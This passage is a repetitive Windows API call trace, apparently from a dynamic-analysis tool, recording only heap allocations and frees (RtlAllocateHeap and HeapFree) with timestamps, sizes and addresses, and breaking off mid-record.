[0179.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.867] HeapFree (in: 